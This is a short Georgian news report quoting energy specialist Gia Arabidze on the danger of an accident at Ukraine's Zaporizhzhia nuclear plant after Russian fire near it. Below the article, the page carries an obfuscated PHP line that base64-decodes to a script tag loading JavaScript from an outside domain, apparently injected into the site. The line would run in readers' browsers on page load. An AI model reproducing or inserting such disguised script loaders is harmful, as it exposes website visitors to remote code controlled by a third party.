celsiusi
ავერსი საქკაბელი
ზაპოროჟიეს ელექტროსადგური ჩერნობილზე 6-ჯერ მეტი სიმძლავრის სადგურია - ერთ-ერთ ბლოკზე მაინც რომ მოხდეს ის, რაც ჩერნობილში, ეფექტი 10-15 ჯერ უფრო უარესი იქნება, აღარც ევროპა იქნება და აღარც დედამიწა - ამის შესახებ ენერგეტიკოსმა გია არაბიძემ რადიო მაესტროს "სატელეფონო ინტერვიუში" განუცხადა. 
 
„ზაპოროჟიეს ექვსივე ბლოკი ერთად რომ აფეთქდეს, ჩათვალეთ, ევროპაში მაინც ყველაფერი დამთავრდება. მაგრამ დავუშვათ, ზაპოროჟიეს ერთ-ერთ ბლოკზე მაინც მოხდეს ის, რაც ჩერნობილში, ეს არის 10-15-ჯერ მეტი პრობლემა, რაც იაპონიაში ამერიკის შეერთებული შტატების მიერ ატომური ბომბის ჩამოგდება. ეფექტი 10-15 ჯერ უფრო უარესი იქნება. რაც შეეხება სიტუაციას ჩვენთან, ეს დამოკიდებულია იმაზე, როგორი იქნება ქარის მიმართულება, ასევე ღრუბლების გადაადგილება. იმედი მაქვს, რომ საქმე აქამდე არ მივდა და როგორც დღეს იღბალმა გადაგვარჩინა, გონიერება გადაგვარჩენს, მაგრამ ეს გონიერება რუს ჯარისკაცებს აქვთ“,- განაცხადა გია არაბიძემ.
 
მისი თქმით, მართალია ხანძრის შედეგად ზაპოროჟიეს სადგურის ჰერმეტულობა არ დარღვეულა, მაგრამ ფაქტი, რომ რუსმა სამხედროებმა ატომური სადგურის მიმართულებით გაისროლეს, აღმაშფოთებელია.
735
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");